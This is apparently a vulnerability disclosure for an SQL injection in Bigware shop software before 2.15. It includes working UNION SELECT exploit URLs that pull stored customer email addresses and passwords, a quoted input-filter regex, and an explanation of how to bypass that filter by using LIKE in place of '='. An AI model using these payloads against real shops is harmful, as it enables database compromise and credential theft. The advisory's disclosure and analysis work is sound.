Summary main_bigware_53.php
The Bigware shop software prior to version 2.15 contains a SQL injection, resulting in full database compromise. The patch for CVE2008-0498 can be circumvented by replacing the '=' sign with 'like'.
Proof of concept:
Original exploit (see exploit-db.com/exploits/5002/):
main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5
/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)
/**/FrOM/**/former/**/WhEre/**/former_id=1/*
Modified (and cleaned up) exploit:
main_bigware_53.php?op=results&pollid=-1 AND voteid=0 AND language_id=5
AND 1 LIKE 1 UNION SELECT GROUP_CONCAT(former_groups_id, char(58),
former_email_address,char(58), former_password) FROM former --
Time line:
12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure
Input sanitation
During the work on the SQL injection in main_bigware_43.php I stumbled over the patch for CVE2008-0498. It was a script named 'stop_injections.php' with the code (error messages truncated):
$SQLInjectionRegexOR = '/[\'")]* *[o][r] *.*(.)(.) *= *\\2(?:--)?\\1?/i';
$suspiciousQueryItemsOR = preg_grep($SQLInjectionRegexOR, $_REQUEST);
if (!empty($suspiciousQueryItemsOR)) die('This is not allowed. If you believe we …');
$SQLInjectionRegexAND = '/[\'")]* *[a][n][d] *.*(.)(.) *= *\\2(?:--)?\\1?/i'
$suspiciousQueryItemsAND = preg_grep($SQLInjectionRegexAND, $_REQUEST);
if (!empty($suspiciousQueryItemsAND)) die('This is not allowed. If you believe …');
My regex knowledge sucks a bit and I was not sure, so I contacted a good friend. He looked at the regex and told me that the expressions just looks for 'or'/'and“ plus '=' somewhere. And what happens if I use 'like' instead of '='? Correct, the filter does not apply. Hint: sqlmap contains a tamper script 'equaltolike.py'.